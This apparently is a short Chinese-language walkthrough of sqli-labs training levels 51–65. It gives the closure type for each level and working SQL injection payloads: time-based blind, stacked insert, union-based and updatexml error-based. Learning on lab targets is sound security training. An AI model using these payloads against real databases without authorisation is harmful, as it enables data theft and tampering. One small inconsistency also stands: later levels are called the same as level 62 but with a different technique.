sqli-labs靶场less51~less65
less51
1.我们打开靶场看一下,并且判断一下得到闭合方式为单引号闭合
2.这一关依旧使用时间盲注,首先爆一下数据库的长度
?sort=1' and if(length(database())>1,sleep(5),1)--+
?sort=1' and if(length(database())>8,sleep(5),1)--+
3.剩余步骤和前面几关相同,只有闭合方式不同
less52
1.打开靶场看一下,是数字型注入
2.这一关我们可以使用堆叠注入,在用户名的地方可以进行相关数据的查询
?sort=1;insert into users(id,username,password) values ('17',(select database()),'123456')
3.剩下的部分可以使用以上的语句进行查询,只要在用户名的地方进行select语句进行查询即可
less53
1.打开靶场看一下,判断闭合方式为单引号
2.这一关可以使用上一关的堆叠注入,也可以使用延时注入,在这里博主使用延时注入爆一下数据库的名字长度,剩余内容按照时间盲注往下做就可以了
1' and if(length(database())>1,sleep(5),1)--+
1' and if(length(database())>8,sleep(5),1)--+
less54
1.打开靶场看一下,判断闭合方式为单引号闭合
2.我们使用联和注入来爆内容,首先看回显点
?id=-1' union select 1,2,3--+
3.接下来数据库名字
?id=-1' union select 1,database(),3--+
4.剩余部分按照联合注入做即可
less55
这一关与上一关的差别在于闭合方式,这一关闭合方式为一个括号,其余做法与上一关相同
less56
这一关与上一关的差别在于闭合方式,这一关闭合方式为‘),其余做法与上一关相同
less57
这一关与上一关的差别在于闭合方式,这一关闭合方式为“,其余做法与上一关相同
less58
1.打开靶场看一下
2.这一关使用报错注入来进行注入
?id=1' and updatexml(1,concat(1,(select database())),1)--+
less59
这一关和上一关做法相同,都是用报错注入,只不过闭合方式为数字型
less60
这一关和上一关做法相同,都是用报错注入,只不过闭合方式为双引号加括号
less61
这一关和上一关做法相同,都是用报错注入,只不过闭合方式为单引号加两个双引号
less62
1.打开靶场看一下,这一关没有报错信息,所以我们使用时间盲注,闭合方式为单引号加括号
1')and if(length(database())>1,sleep(5),1)--+
1')and if(length(database())>8,sleep(5),1)--+
less63
这一关和上一关一样,使用报错注入,闭合方式为单引号
less64
这一关和前两关一样,使用报错注入,闭合方式为两个括号
less65
这一关和前几关一样,使用报错注入,闭合方式为一个单引号